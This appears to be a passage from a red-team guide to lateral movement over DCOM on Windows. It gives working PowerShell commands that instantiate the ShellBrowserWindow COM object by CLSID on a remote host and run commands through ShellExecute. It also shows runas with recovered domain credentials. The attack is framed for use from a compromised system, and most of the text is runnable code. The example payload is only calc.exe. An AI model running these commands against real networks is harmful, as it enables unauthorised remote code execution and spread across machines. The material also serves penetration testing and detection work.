PS> $item.Document.Application.ShellExecute("iexplore.exe","https://www.youtube.com/watch?v=AaxQhNBBSkM","C:\Program Files\Internet Explorer",$null,"1")

ShellBrowserWindow Object

Functionally the same as the previous method, the ShellBrowserWindow object can be leverage for remote code execution over DCOM

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows


When invoking .NET calls in this fashion, the existing auth token is used. Great for lateral movement from a compromised system, but not if you are remotely accessing a target machine with recovered credentials. The simplest method we have found is to create a new PS Session with runas.

Example auth:

PS> runas /netonly /user:TESTLAB\josh "powershell.exe"


Example code execution:

PS> $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"192.168.112.200")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $obj.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)